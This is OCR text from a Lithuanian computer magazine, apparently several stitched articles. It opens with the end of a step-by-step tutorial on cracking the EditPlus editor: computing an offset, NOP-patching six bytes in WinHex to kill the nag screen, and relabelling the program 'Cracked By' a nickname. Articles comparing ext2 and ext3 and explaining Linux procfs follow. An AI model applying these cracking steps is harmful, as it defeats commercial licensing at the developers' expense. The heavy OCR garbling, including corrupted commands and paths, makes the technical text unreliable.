pačiam nelabai patinka su derintuvu redaguoti dvejetainės bylas, nors 
Jis gali padaryti Ir tai, todėl pirmas | galvą atėjęs dalykas — EditPius. 
exe patvarkyti su redaktoriumi WinHex. Jis labai patogus. Paleidžiam 
jį ir atidarome EditPlus.exe. Paskaičiuojame, nuo kur reikėtų pradėti 
baitų pakeitimą. OlyDbg skaičiavo poslinkius, pradedant 00401000h 
adresu. Iš 004C8097h atimam 00401000h. Gauname C7097. 
To reikia tam, kad žinotum poslinkį „absoliučios“ pradžios atžvilgiu, 
juk WinHex programoje adresacija prasideda nuo nulio. WinHex'e 
spaudžiame kombinaciją Alt+G, kuri leis peršokti nurodytu adresu. 
Adresus reikia įvedinėti dešimtainėje sistemoje, mūsų adresą galima 
lengvai paskaičiuoti pasinaudojant Windows skaičiuotuvu (Calcula- 
tor|. Mums reikalingas poslinkis (C7097h) dešimtainėje sistemoje 
bus lygus 815255. Tiesa, OllyDbg neatvaizduoja pirmų 1024 bylos 
antraštės baitų. Mes tai įvertinsime ir prie mūsų poslinkio pridėsime šią 
reikšmę. Gauname 816279. Įvedame šį skaičių ir spaudžiam Enter. 
Operacija atlikta ir mes perėjome reikiamu adresu. Pradėję šia vieta, 
visus 6 baitus pakeičiame į 90h. Išsaugome bylą ir ją paleidžiame. 
Valio, daugiau jokių užknisančių langų! :) Dabar beveik viskas gerai, 
tačiau keista viena: kuomet mes mūsų nulaužioje programoje pa- 
sirenkame „Help-> About“, ten parašyta, kad ji yra „Unregistered“. 
Tačiau tai neatitinka realybės. Atsidarykime mūsų programą su WinHex 
ir ten suraskime eilutę „Unregistered Copy“. Pakeiskime ją į „Cracked 
By“, olikusias raides pakeiskime tarpais. Toliau suraskime eilutę „For 
Evaluation“ ir ją pakeiskime savo slapyvardžiu (likusius simbolius taip 
pat pakeiskime tarpais). Viskas, padaryta! Pageidaujantieji iš progra- 
mos taip pat gali su kokiu nors ResourceHacker'iu pašalinti meniu 
punktus „Enter Registration code“ ir „Order Now“. 


[Sėkminga pabaiga] 

Štai mes ir susidorojome su viena programa. Derėtų pastebėti, kad 
aš ėmiausi paties paprasčiausio laužimo būdo, kuris vadinamas 
bit-krekingu. Jo esmė — tam tikrų baitų pakeitimas. Dažniausiai 
tai būna sąlyginio perėjimo baitai. Šiuo metu, „ekstremalių“ 
protektorių ir aparatinės apsaugos raktų amžiuje, atrodytų, jau 
neliko programų, kurias būtų galima nulaužti štai taip. Tačiau 
praktika rodo kai ką kita. 


sukuriame breikpointus visoms procedūroms GetWindowlextA 
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Pasaulių karas: 
„ext2 vs ext3“ 
Žvilgsnis į „Linux“ failų 
sistemas neįprastu kampu 
= APIE EXT3 FAILŲ SISTEMOS PRIVALUMUS 
8 IR TRŪKUMUS PARAŠYTA DAUG. MANOMA, 


KAD JI UŽTIKRINA GERIAUSIĄ PATIKIMUMĄ 
NAŠUMO SUMAŽĖJIMO SĄSKAITA. TAČIAU 
TOLI GRAŽU NE VISADA EXT3 ATSILIEKA 
NUO EXT2, O KAI KURIAIS ATVEJAIS JĄ 
NET LENKIA, ŽYMIAI LENKIAI 


UNITS 


[Įvadas] Tikroji prasmė ne testuose, ne grafikuose ir ne dia- 
gramose, o fizinėje jų interpretacijoje. Atlikti eksperimentą ne 
taip paprasta! Norint gauti patikimus, atkuriamus ir objektyvius 
rezultatus, būtina žinoti, kaip suorganizuota failų sistema ir kokie 
krumpliaračiai priverčia ją judėti. Visada galima parinkti tokį testų 
rinkinį, kuriame „gera“ failų sistema bus greitesnė už „blogą“, 
0 visus su tuo nesutinkančius galima apšaukti lameriais, kurie 
nieko neišmano subtiliuose daugiaužduotinės operacinės sistemos 
niuansuose, multilyginiame keše ir t.t. 

Pabandysime failų sistemas sulyginti pagal keletą kriterijų: patikimumą, 
atsparumą trikdžiams, našumą irt.t., kad kiekvienas galėtų pasirinkti 
sau reikalingą variantą. Ko gero, mes pradėsime nuo našumo. 


[Kuomet duomenys virsta pelenais] Ext2 ir ex13 failų sistemos 
labai panašios. Ext3 — tai ext2 su žumalizavimo, t.y. transakcijų 
palaikymu. Transakcijomis vadinamos grupinės operacijos, kurios 
yra įvykdomos arba neįvykdomos kaip viena vieninga operacija, kitaip 
tariant, atomiškai. Visa tai paaiškinsiu remdamasis klasikiniu pinigų 
pervedimo iš banko A į banką B pavyzdžiu. Žemame lygyje ši operacija 
suskaidoma į dvi: pinigų nuėmimas nuo sąskaitos ir pinigų pervedimas. 
Ojeigu pervedimo metu įvyks sutrikimas, ar programos vykdymas bus 
nutrauktas? Kad klientas neliktų be pinigų, reikia numatyti automatinį 
„Erąžinimą“ (rollback). Pervedimas arba atliekamas, arba ne. Tarpinių 
būsenų nėra. 

Sugrįžkime prie failų sistemų. Kodėl FAT16/32 sistemose nuolat 
susiformuoja prarasti klasteriai? Ogį todėl, kad ši sistema nepripažista 
transakcijų, 0 iš kelių stadijų susidedančios vieningos operacijos nėra 
atliekamos atomiškai! Štai, pavyzdžiui, bylos kopijavimas. Sistema 
išskyrė disko erdvę irjau susiruošė ją atiduoti bylai, kaip viskas pakibo 
(galimi variantai: montuotojas nukirto laidus, vartotojas paspaudė 
RESET), dėl ko vienas ar keli klasteriai tapo niekieno. 
Žurnalizuojančios failų sistemos (ext3, NTFS) tokiais atvejais kito 
užsikrovimo metu atlieka automatinį „grąžinimą“, todėl klasteriai 
nėra prarandami. Bylos sukūrimas/pašalinimas/pervadinimas — tai 
atominės operacijos, kuriose negali būti tarpinės būsenos. O su 
perkėlimo operacijomis viskas dar sudėtingiau. Failų sistema ne- 
gali perkelti bylos tarp skirtingų particijų, dėl ko programa-aplinka 
(explorer) yra priversta tai daryti savarankiškai. Galiausiai perkėlimo 
operacija suskaidoma į dvi atskiras dalis: a) pradinės bylos (source 
file) kopijavimą į paskirties vietą (destination file) ir b) pradinės bylos. 
pašalinimą. Tuo pačiu gali susidaryti tokia nekokia situacija, kuomet 
paskirties byla nebuvo įrašyta į diską (pavyzdžiui, sistema nespėjo 
Jos įrašyti iš disko kešo), tačiau pradinė byla jau buvo pašalinta. 
Štai čia ir padeda transakcijos. Be to, transakcijų galimybė ne- 
gali apdrausti nuo įrašomų duomenų praradimo, kadangi žurnalo 
byla atnaujinama ne tuojau pat, 0 su tam tikru užlaikymu. Tran- 
sakcijos taip pat bejėgės pasipriešinti fiziniams disko paviršiaus. 
pažeidimams, nekorektiškai veikiančiai programinei įrangai ir tt. 
Daugelis ext2 lygina su FAT, o ext3 — su NTFS, tačiau tai neteis- 
inga. Pagal savo architektūrą ext2 kur kas artimesnė NTFS, nei 
FAT. Grubiai šnekant, ext2 — tai NTFS be transakcijų. Dėl didelio. 
pertekliškumo laipsnio (didelio viena kitą dubliuojančių struktūrų 
kiekio) ext2 pakankamai atspari sutrikimams, todėl dėl jos vi 
entisumo galima per daug nesijaudinti. Po netikėto maitinimo: 
atjungimo ji nenulūš. Transakcijų galimybė ext3 sistemoje pa- 
didina duomenų saugojimo patikimumą, tačiau ne taip radika- 
liai, kaip kai kurie bando tvirtinti. Pasirinkus „tik metaduomenų 
žurnalizavimo“ (data=writeback) režimą, visi rašymui atidaryti 
duomenys maitinimo dingimo akimirką gali būti nunulinti arba 


užpildyti šiukšlėmis. „Žurnalizuoti viską“ (data=journal) režime visi 
duomenys iš pradžių yra įrašomi į žumalą, o tik po to perkeliami 
į bylą. Tai žymiai sumažina našumą, tačiau garantuoja duomenų 
ir metaduomenų būsenos neprieštaringumą: byla arba įrašoma 
pilnai, arba iš viso neįrašoma. Tai reiškia, kad netikėtai dingus 
maitinimui arba perkrovus sistemą informacijos praradimas vis 
dėlto yra imanomas. 


Atstatinėti ext3 sistemoje dingusius duomenis kur kas sunkiau, 
nei ext2, kadangi prieš bylos pašalinimą jai priklausančių blokų 
sąrašas yra kruopščiai Išvalomas, todėl paprastai padaryti undelete 
jau neįmanoma. Beje, tai ne klaida, 0 „taip sumanyta“. Portale 
Wwww.opennet.ru yra FAO apie ext3 failų sistemą (www.opennet. 
ru/base/fag/ext3 fag.txt.html), kuris su nuoroda į Andreas Dilger'į 
vieną iš kūrėjų) sako štai ką: „Po lūžimo saugaus unlinkinimo 
lunlink) pratęsimo galimybei patikrinti failų sistema ext3 nunulina 
Inode'uose saugomas nuorodas į blokus, o ext2 tiesiog pažymi 
šiuos blokus kaip nenaudojamus, inode'us — kaip pašalintus, 
dėl ko nuorodos lieka nepaliestos. Vienintelis dalykas, kurį jums 
lieka daryti — iškviesti grep ir taip surasti pašalintų bylų dalis bei 
tikėtis geriausio“. 

Tačiau ne viskas taip beviltiška. Taip, nuorodos į DIRECT blokus 
pradanginamos negrįžtamai, tačiau netiesioginės adresacijos blokų 
turinys lieka nepaliestas, todėl bylos galas atstatomas tiesiog el- 
ementariai. Po gabalėlį surinkinėti tenka tik jos pradžią. Išsamiau 
apie tai bus galima paskaityti mano knygoje „Duomenų atstatymo 
technika“ (darbinis pavadinimas), kuri turėtų išeiti artimiausiu 
metu, o kol kas prieinama tik „palengvinta“ versija, kurią gali rasti 
mano ftp. 

Kita rimta problema — žurnalo vientisumas ir agresyvus fsck 
pobūdis, neadekvačiai reaguojantis į kai kuriuos pažeidimų tipus. 
Pastaruoju metu pasirodė daugybė pranešimų apie nekokybiškus 
SATA valdiklius, kurie sukelia Įvairiausių sutrikimų, paliečiančių 
žurnalą ir metaduomenis. Pagrindinė particijos struktūra lieka 
praktiškai nepažeista (tiesiog mažytis įtrūkimas), ją dar galima 
išgelbėti atstatinėjant rankiniu būdu, tačiau paleistas fsck particiją 
galutinai pribaigia, beje, ext3 nukenčia kur kas smarkiau, nei ext2. 
Greičiausiai taip nutinka todėl, kad žurnale atsiranda šiukšlės, 
0 fsck bando jas „teisingai“ interpretuoti, ko pasekmes jau 
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paminėjau... Be abejo, ext3 gerbėjai gali pasakyti, kad nėra ko 
tokią sistemą naudoti su nekokybiška geležim, kad reikia nusipirkti 
normalų SCSI valdiklį ir atsisakyti ATA. Visa tai teisinga, tačiau vis 
tiek niekas nėra apdraustas nuo aparatūrinės įrangos sutrikimų, 
todėl „apvažinėjant“ naują aparatūrą visada geriau naudoti ext2 ir 
tik po to pereiti prie ext3. Be to, prieš leidžiant fsck pradėti gydyti 
diską, primygtinai rekomenduojama paleisti diskų redaktorių Ide 
(Linux Disk Editor santrumpa) ir pažiūrėti, kas būtent nutiko su 
duomenimis. Galbūt paprasčiausia būtų viską atstatyti rankiniu 
būdu? Darbo su /de metodų aprašymą galima rasti adresu konc. 
opennet.ru/recover.Zip. 

Taigi patikimumo klausimas vis dar aktualus, 0 ext2 sistema 
daugeliu atveju vis dėlto yra geresnė. 


[Greitaveikos klausimai, arba vėžlys ateina pirmas] Manoma, 
kad bendru atveju žurnalizuojančios failų sistemos našumo atžvilgiu 
nusileidžia „įprastinėms“, tačiau „bendras atvejis“ — neapibrėžta 
sąvoka. Testų rezultatai varijuoja labai plačiose ribose, todėl be 
logikos čia surasti tiesą iš tiesų ganėtinai sudėtinga. 

Remiantis bendriniais samprotavimais, vykdant skaitymo operacijas 
abi failų sistemos turėtų užtikrinti identišką našumo lygį, kadangi 
skaitant duomenis į žurnalą nesikreipiama. Iš pirmo žvilgsnio, tai 
iš tiesų taip, kuo mus įtikina nepriklausomų testuotojų, dirbančių 
su darbo stotimis su vienu disku duomenys (pavyzdžiui, staff. 
osuosl.org/—kveton/fs/page2.php). Iš čia galima daryti išvadą: 
jeigu skaitymo operacijų daugiau nei rašymo, tuomet našumo 
tarp ext2 ir ext3 skirtumas tampa praktiškai nepastebimas, o su 
diskais, kurie sumontuoti „tik skaitymui“ skirtumo iš viso nėra. 
Namų kompiuteriuose iš tiesų taip ir yra. 


Serveriuose ir galingose darbo stotyse situacija visiškai kita. Ten 
sumontuoti ištisi diskų masyvai, vienas iš kurių išskiriamas žurnalui 
saugoti. Toks būdas atliekant įrašymo operacijas žymiai padidina 
našumą, tačiau sumažina efektyvų pralaidumą atliekant skaitymo 
operacijas, kadangi vienas masyvo diskas lieka neįdarbintas. 
Žvilgtelėk į serverio Adaptec DuraStor 6220SS (su RAID5) 
testavimo rezultatus, kurie buvo pateikti straipsnyje „Journaling 
on RAID“ (linuxgazette.net/102/piszcz.html). Su tokia aparatūros 
konfigūracija ext3 su vienu duomenų srautu skaitymas vyksta vos 
ne du kartus lėčiau! Su 16 srautų skirtumas šiek tiek suvienodėja, 
tačiau vis tiek išlieka pakankamai žymus. Išvada: jeigu skaitymo 
operacijų atliekama daugiau nei rašymo, tuomet serveriuose ext2 
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TPC-C testo, imituojančio darbą su duomenų baze, renultatai 
vienareikšmiškai valdo, juo labiau, kad duomenų praradimo rizika 
tokiu atveju lygi nuliui — juk į diską nėra rašoma! 

Beje, apie rašymą. Su rašymu viskas kur kas prasčiau. Remiantis 
bendriniais samprotavimais, žurnalizavimas reikalauja laiko ir 
apčiuopiamai sumažina našumą, ką patvirtina visi nepriklausomi 
testuotojai. Įrašymas ext3 sistemoje atsilieka nuo ext2 maždaug 
5096, o daugelio objektų (bylų, katalogų) pašalinimo operacijos 
ext3 sistemoje atliekamos net dešimtis kartų lėčiau! Remiantis 
tuo, galima padaryti tikrai akivaizdžias išvadas: ext3 — ganėtinai 
lėta failų sistema, kuri savo egzistavimą pateisina tik dėl padidinto 
patikimumo lygio. 

Šis tvirtinimas neteisingas. Įrašymas į žurnalą gali būti atlieka- 
mas lygiagrečiai kartu su duomenų/metaduomenų atnaujinimu, 
tiktai juos reikia įkurdinti skirtinguose kietuosiuose diskuose. 
Remiantis intuicija, tai turėtų visiškai priartinti ext3 prie ext2. 
Tokiomis sąlygomis ext3 gali pasirodyti... greitesnė, beje, žymiai 
greitesnė! Grįžkime prie paveikslėlio su Adaptec DuraStor 
6220SS serveriu, kuris į ext3 su vienu srautu rašo tris kartus 
greičiau, nei į ext2! Savaime suprantama, su 16 srautų skirtu- 
mas sumažėja, tačiau ext3 kaip ir anksčiau išlieka priekyje. Taip 
išeina, kad našumo atžvilgiu serveriuose ir į įrašymą orientuotose 
galingose darbo stotyse naudingiau naudoti ext3, 0 read-only 
particijoms visada naudoti ext2? Kai kuriems administratori- 
ams tai gana netikėta išvada, O galbūt šis Adaptec DuraStor 
6220SS specialiai pritaikytas ext3, o eksperimento rezultatai 
sufalsifikuoti? 

Gerai. Pabandykime žvilgtelėti į duomenų bazes. Paimkime, 
pavyzdžiui, Oracle ir pažiūrėkime, su kokiomis failų sistemomis ją 
rekomenduojama naudoti. Kompanijos svetainėje (www.oracle. 
com/technology/oramag/webcolumns/2002/techarticles/scalzo 
linuxO2.htm) pateikiami ypatingai įdomūs rezultatai, kuriais galima 
tikėti, kadangi užsiiminėti ext3 propaganda Oracle neturi prasmės. 
Mes matome (žr. paveikslėlius), kad atliekant visas operacijas, 
kurias tik galima atlikti su duomenų baze, ext3 užtikrina dvigubai 
didesnį našumą. 

Kaip gi taip gali būti?! Nejaugi žurnalo buvimas padidina 
greitaveiką? Žurnalas čia visiškai niekuo dėtas, 0 našumą jis tik 
sumažina. Tiesiog ext3 sistemoje šiek tiek patobulintas kešavimo 
mechanizmas ir atlikta keletas kitų pakeitimų, apie kuriuos doku- 
mentacija nutyli, tačiau rezultatas akivaizdus. 

Analogiškai reikalai klostosi ir su MySOL bei PostgreSOL, tačiau 
man nepavyko surasti „oficialių“ testų rezultatų, 0 testuoti duomenų 
bazę namų sąlygomis išties keblu. 


[Vienas fragmentas, du fragmentai] Lyginti failų sistemų 
našumą galima tik esant identiškoms sąlygoms, kitaip tariant, 
esant vienodam fragmentacijos lygiui. Japonų agentūros IPA 
(Information-Technology Promotion Agency) kolektyvas išleido 
specialų įrankį davtools (davtools.sf.net), kuris disko būklę vi- 
zualizuoja taip pat, kaip tai darė senasis Norton Speed Disk. 
Paaiškėjo, kad ext2/ext3 particijos ilgainiui ganėtinai smarkiai fragmen- 
tuojasi (žr. paveikslėlius), kas paneigia teiginį apie ext2/ext3 tobulumą 
irjų nepriklausomumą nuo fragmentacijos. Fragmentacijai pavaldžios 
visos sistemos, be abejo, išskyrus tas sistemas, kurios palaiko foninę 
defragmentaciją, kaip tai padaryta, pavyzdžiui, su UFS. 

Kai kurie „specialistai“ tvirtina, kad Linux sistemoje fragmentacija 
našumą lemia kiek sudėtingiau. Tarkim, vienu metu yra skaitomos di 
bylos. Nesant fragmentacijos galvutei teks nuolat keisti padėtį, mėtantis 
tarp dviejų bylų, kas nėra gerai. O jeigu bylos būtų suskaidytos į vieną po 
kito einančius blokus, tuomet galvutės Judesiai suformuos tiesinę seką, 
ir, nepaisant didelės fragmentacijos, skaitymo greitis smarkiai išaugs. 
Savaime suprantama, fragmentacija būna skirtinga, tačiau naivu man- 
yti, kad optimalus „išsidėstymas“ susiformuoja natūraliai. „Laukinės 
gamtos“ sąlygomis sistema bylas išmėto po visą operatyvųjį perimetrą, 
dėl ko galvutei reikia atlikinėti labai didelius padėties keitimus, kad vis- 
kas būtų surinkta į vieną visumą. Tačiau apie jokį nuoseklų skaitymą čia 
nėra nė kalbos! O gerų ext2/ext3 sistemoms skirtų defragmentatorių, 
kuriuos būtų galima parekomenduoti, nėra. 

Šiuo atžvilgiu geriau naudoti ext2, o ne ext3, kadangi pastarosios 
žurnalas dažnai būna smarkiai fragmentuotas, kas įvertinus jo 
naudojimo intensyvumą sukelia smarkų stabdymą. 


[Pabaiga] Optimalios failų sistemos pasirinkimas — labai 
sudėtinga ir neakivaizdi užduotis. Teorija ne visada atitinka praktiką, 
todėl tenka būti pasiruošusiam įvairiausiems netikėtumams. 
Visada atsižvelk į įrangos gamintojų ir programų kūrėjų patarimus, 
Dažniausiai, jie jau yra atlikę visus reikiamus testus arba net 
optimizavę savo produktą tam tikrai failų sistemai su konkrečiais 
nustatymais. Deja, čia neįmanoma duoti universalių visiems 
tinkančių patarimų, todėl mes apsiribosime tik pačiomis bendri- 
ausiomis rekomendacijomis.. 

Prie UPS'o prijungtuose namų kompiuteriuose geriausia būtų naudoti 
ext2, kuri pagal nutylėjimą įdiegiama daugelyje distributyvų. Jeigu jau 
neturi rezenvinio maitinimo šaltinio, o elektros atjungimas (pakibimai, 
netikėti perkrovimai) — įprastas reiškinys, naudok ext3 ir pasirink 
maksimalų žumalizavimo lygį. Norėdamas didlesnio našumo, žumalo bWlą 
išsaugokį atskirą kietąjį diską, kuris būtų prijungtas prie savo atskiro IDE 
kanalo (beje, tai nėra būtina, kadangį šiuolaikiniai IDE įrenginiai moka 
normaliai vienas su kitu pasidalinti 
Vieną magistralę, jeigu, be abejo, 
nesugalvoja pakonfiktuoti). 
Serveriuose ir darbo stotyse 
su RAID masyvais ext2 galima 
įdieginėti tuo atveju, jeigu šios 
mašinos orientuotos į skaitymą, 
o ext3 — jeigu orientuotos į 
rašymą. Ext3 atveju daugiausia 
išlošiama tuomet, kai dirbama 
su duomenų bazėmis, tačiau čia 
Viskas priklauso nuo Užklausų 
ir pačios duomenų bazės tipo. 
Tokiu atveju patikimą atsakymą 
duoti gali tik eksperimentas. 


Įrankis davools, kuris vizualzuoja 
pasirinkto bylų sąrašo fragmentacija 
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Kelionė į branduolio centrą 
Tyrinėjam virtualią 

failų sistemą „procfs“ 

TUO METU, KAI KITOSE OPERACINĖSE 
SISTEMOSE NORINT VARTOTOJUI SUTEIKTI 
GALIMYBĘ KONTROLIUOTI BRANDUOLIO 
VEIKIMĄ, TAIP PAT GAUTI PRIĖJIMĄ PRIE 
SISTEMINĖS STATISTIKOS SU IŠSAMIA IN- 
FORMACIJA APIE PROCESUS, APARATŪRĄ 
BEI TINKLĄ, REIKIA DAUGYBĖS SKIRTINGŲ 
PROGRAMŲ, LINUX SISTEMOJE VISA TAI 
PASIEKIAMA LABAI PAPRASTAI — PER 
/PROC FAILŲ SISTEMĄ. ŠIAME STRAIP- 
SNYJE KAIP TIK IR PAKALBĖSIME APIE 
PROCFS. 


[Bendri duomenys apie „procfs“] Visų pirma, virtuali 
failų sistema procfs skirta gauti informaciją apie paleistus 
procesus — pavadinimą, unikalų identifikatorių, išskirtos 
atminties kiekį ir t.t. Linux sistemoje ji taip pat aprūpina 
vartotoją informacija apie aparatūrą, failų sistemas, sutei- 
kia priėjimą prie sisteminės statistikos, leidžia „veikimo 
metu“ (on-the-fly) keisti tam tikrus branduolio para- 
metrus. Įdomu tai, jog procfs neegzistuoja nei fiziniame 
diske, nei operatyvinėje atmintyje. Kai kreipiamasi į kokią 
nors bylą, kuri yra kataloge /proc (būtent prie jo paprastai 
montuojasi mūsų šiandien aptariama FS), branduoliui 
perduodamas atitinkamas pranešimas ir jis atsakydamas 
grąžina reikiamą informaciją. Taip sukuriama darbo su tikra 
kietajame diske esančia FS iliuzija. Su procfs veikia labai 
daug programų, todėl ji yra gyvybiškai svarbi bet kuriam 
Linux distributyvui. 


[Procesai ir jų viduriai] Jeigu jau procfs buvo kuriama kaip 
„procesų failų sistema“, tai ir pradėsime būtent nuo šios funkcijos. 
Jeigu tu žvilgtelėtumei į katalogą /proc, tai pamatytum daugybę 
katalogų, kurių pavadinimai sudaryti tik iš skaičių. Toks pavadinimas 
nurodo proceso PID, o pačiame kataloge saugoma su šiuo procesu 
(jo identifikatoriumi) susijusi informacija. Pavyzdžiui, informaciją 
apie procesą init, kurio PID visada lygus vienam, galima rasti 
kataloge /proc/1. Yra ir dar vienas specialus su procesais susijęs 
katalogo elementas: /proc/self. Ši nuoroda parodo tą procesą, 
kuris šiuo metu dirba su /proc katalogu. Dabar pakalbėsime apie 
tokių katalogų turinį. Pirmoji byla, į kurią reikėtų atkreipti dėmesį: 
cmdline. Tai proceso paleidimo eilutė, t.y. programos pavadinimas 
irjai perduoti argumentai. Jeigu šioje byloje nieko nėra, tai reiškia, 
Kad procesas yra swap'e arba pavirto zombiu. Kataloge taip pat yra 
nuoroda su pavadinimu exe, rodanti i vykdomą bylą, kurią palei- 
dus ir buvo pagimdytas šis procesas. Taip galima paleisti proceso 
kopiją. Dar dvi nuorodos root ir cwd rodo į proceso failų sistemos 
šaknį bei einamą darbinį katalogą. Labai naudingas gali būti by- 
los environ turinys, nes jame tu rasi proceso aplinką (paveldėtus 
aplinkos kintamuosius). Atkreipk dėmesį, kad bylos eilutės atskirtos 
ne naujos eilutės, o nuliniu simboliu (išmanantieji C supras, kodėl 
taip padaryta). Taigi norint bylos turinį pateikti patogiai skaitomu 
pavidalu, teks įvykdyti tokią komandą: 
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Jeigu jau pradėjome kalbėti apie procesų aplinką, tai derėtų 
paminėti ir katalogą fd, kuriame saugomos nuorodos į proceso ati- 
darytas bylas. Nuorodos pavadinimas yra bylos deskriptorius. Kaip 
žinia, bet kurio proceso bylos deskriptoriai, kurių numeriai O, 1ir 2, 
yra standartiniai įvedimo, išvedimo ir klaidų išvedimo srautai. Taigi 
paprastai konsolinei programai visos trys bylos rodys į terminalinį 
įrenginį (dev/vc/* konsolei ir /devipts/* xterm'ui). Demonų atveju 
bylos rodys arba į /dev/null, arba jų iš viso nebus (jeigu programa 
uždarė bylos deskriptorių). Žinant aukščiau išsakytus dalykus, 
galima prisigalvoti įdomių pramogų, pavyzdžiui, programos išvedimą 
nukreipti į jos įvedimo srautą: 


> cammand > /proc/selį/fd/O 


Panaudojant procfs taip pat galima sužinoti, kokią adresų erdvę 
užima procesas. Tokia informacija prieinama byloje maps, kuri 
sudaryta iš eilučių. Kiekvienos eilutės formatas yra toks: adresų 
erdvė, teisės, poslinkis vykdomoje byloje, įrenginys, kuriame yra 
byla, bylos deskriptoriaus numeris, kelias iki vykdomos bylos arba 
bibliotekos. Ši byla labai naudinga, kai reikia sužinoti, kokias 
bibliotekas, Iš kur ir kokiais adresais kraunasi procesas. Populiari 
programa Isof aktwiai naudoja būtent šiuos duomenis. 
Statistiniai duomenys apie procesą pateikiami bylose stat, statm ir 
status. Pirmųjų dviejų formatas yra „žalias“ (raw), kurį gana gerai 
įvaldę programuotojai, tačiau jokiu būdu ne paprasti vartotojai, O 
status tą pačią Informaciją pateikia žmogui suprantamu pavidalu. 
Iš laukų pavadinimų lengva suprasti jų paskirtį, todėl šiuo atveju 
labiau nesigilinsiu. 


[Aparatinis lygis] Pasinaudojus /proc, galima daug sužinoti 
apie aparatūrą (geležį): informaciją apie įdiegtus procesorius, 
operatyvinę atmintį, PCI magistralę irt.t. Visi duomenys pateikiami 
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realiu laiku. Tai reiškia, jog prie 
kompiuterio prijungus kokį 
nors plug'n'play įrenginį, tu 
tuojau pat su procfs galėsi apie 
Jį susidaryti savo nuomonę. Iš 
pradžių žvilgtelėsim į bylą 
Iprac/cpuinfo, kurioje, kaip 
Jau tikriausiai galima numan- 
yti, saugoma informacija apie 
centrinį procesorių. Iš dėmesio 
vertų laukų paminėčiau štai 
ką: vendor id — procesoriaus tiekėją identifikuojanti eilutė, mode! 
name — procesoriaus modelis (pavyzdžiui, AMD Sempron(tm) 
2600+), cpu MHz — procesoriaus darbo dažnis (tikslumas iki 
tūkstantosios dalies), cache size — spartinančios atminties 
apimtis, flags — palaikomų instrukcijų rinkiniai (tokie, kaip MMX 
ir SSE). Taip pat žvilgtelėk į bogomips lauką — tai procesoriaus 
našumo pseudotestas. 

Toliau pagal prioritetą, be jokios abejonės, eina informacija apie 
seeiininę atmintį, kurią galima lengvai išgauti iš bylos /proc/ 
meminfo. Čia pakankamai daug laukų, o jų kiekis priklauso nuo 


Gore DB — tai programos 
„Iūžimo“ metu (OUIT, ABRT, 
SEGV Ir kiti signalai) branduo- 
lo sugenenuojama byla. Joje 
yra proceso atminties turinys 
(eump), kuris skirtas šio įvykio 
prietasčiai Išaiškint 


Šmaikštus BogoM/PS 
apiuūcinimas: „Kiek Kartų per 
Sekundę procesorius gali Nieko 
Neda". 


opcijų, su kuriomis buvo sukompiliuotas branduolys (pavyzdžiui, 
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highmem). Bendras operatyvinės atminties kiekis nurodomas 
lauke MemTotal. Nenustebk, jeigu tau čia truks 2-5 baitų, nes 
Jie buvo panaudoti branduolio patalpinimui atmintyje ir todėl jie 
neprieinami vartotojiškoms programoms. Aš nė neaiškinsiu, kas yra 
MemFree, tuo tarpu laukai Buffers ir Cached yra ganėtinai įdomūs. 
Pirmasis parodo kietojo disko spartinančiajai atminčiai (cache) 
išskirtą atminties dalį, 0 antrasis atvaizduoja iš disko užkešuotų 
bylų kiekį. Informacija apie swap sritis yra laukuose SwapTotal ir 
SwapFree. Standartinė komanda free informaciją gauna būtent 
iš šios bylos. 

Išsamios informacijos apie visus Linux krovimosi metu aptiktus PCI 
įrenginius tu rasi byloje /proc/pci. PCI magistralė šiuolaikiniuose 
kompiuteriuose yra ne tik praplėtimo magistralė, tačiau ir kitų 
magistralių pagrindas (pavyzdžiui, USB), todėl /proc/pci byloje be 
informacijos apie prijungtus įrenginius gali rasti duomenis apie 
įvairius valdiklius ir kitas magistrales. Primygtinai rekomenduočiau 
branduolyje įjungti opciją Bus options (PCI, PCMCIA, EISA, MCA, 
ISA) -> PCI device name database. Po šio pasikeitimo branduolys 
išsipūs 80-čia Ko, tačiau visi PCI įrenginiai vietoje Unknown turės 
prasmingus pavadinimus. 

Informacija apie kitus įrenginius, kurie prijungti prie PS/2 (pelė, 
klaviatūra) ir USB lizdų, yra bylose /proc/busJinput/devices Ir /proc/ 
bus/usb/devices. Beje, tam, kad sistemoje būtų sukurta antroji byla, 
branduolys turėtų būti sukompiliuotas su opcija Device Drivers -> 
USB support -> USB device filesystem. 

Dabar pereikime prie ACPI, kuri visų pirma yra maitinimo ir energijos 
suvartojimo valdymo sistema. Procfs sistemoje numatyta galimybė 
pervesti sistemą į įvairias daug energijos nevartojančias miego 
būsenas. Visos motininėje plokštėje galimos būsenos išvardintos 
byloje /proc/acpi/sleep. 

Dabar teks branduolyje aktyvuoti opciją Power management 
options (ACPI, APM) -> acpi — ACPI... -> Sleep States, kad 
būtų galima gauti galimybę valdyti ACPI būsenas. Norint gauti 
S4, prireiks opcijos Power management options (ACPI, APM -> 
Software Suspend), taip pat į branduolio krovimosi opcijas reikia 
pridėti resume=/dev/kur tavo swap. 

Pervesti kompiuterį į miego būseną labai paprasta. Pakanka į 
bylą /proc/acpi/sleep įrašyti būsenos numerį, ką galima padaryti, 
pavyzdžiui, taip: 


$ echo 3 > /pod/ogi/slep 


Ir paskutinis katalogo /proc elementas, kurį aš noriu aptarti 
šiame skyrelyje: /proc/driver. Paprastai trečiųjų šalių gamintojų 
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tvarkyklės jame sukuria savo kampelį. Šio katalogo užpildymas 
smarkiai priklauso nuo branduolio konfigūracijos, todėl aš visa 
tai aprašysiu remdamasis savo mašinos pavyzdžiu. Pas mane 
čia yra byla rtc, atvaizduojanti to paties pavadinimo tvarkyklės 
darbo statistiką (Real Time Clock — realaus laiko laikrodis), 
bei katalogas nvidia, kurį sukūrė firminė kompanijos „nVidia“ 
vaizdo plokščių tvarkyklė. 


ĮIdentifikacija] Ką visų pirma reikia sužinoti apie OS? — „Be jokios 
abejonės, versiją!“ — atsako visi vieningai. Teisingai, informacija 
apie branduolio versiją ir sukompiliavimo laiką pateikiama byloje 
/proc/version maždaug tokiu pavidalu: 


Linux: version 28.11 (roat2Dlocalhosi) (ge version 343) 47 Sat Jul 23 16:08:26 
YEKST 2005 


Nori išsiaiškinti, su kokiais parametrais buvo užkrautas branduolys? 
Žvilgtelėk į bylą /proc/cmdline. 

Šiuo metu užkrautų modulių sąrašas saugomas byloje /proc/ 
modules. Jos formatas toks: modulio pavadinimas dydis 
priklausomybių kiekis — Live adresas atmintyje. Priklausomybių 
kiekis — tai skaičius, kuris parodo, kiek kitų modulių priklauso 
nuo šio modulio. Komanda Ismod informaciją ima būtent iš 
Iproc/modules. 

Visos branduoliui įkandamos failų sistemos išvardintos byloje 
Iproc/filesystems. Tiesą sakant, šis sąrašiukas gali pasirodyti šiek 
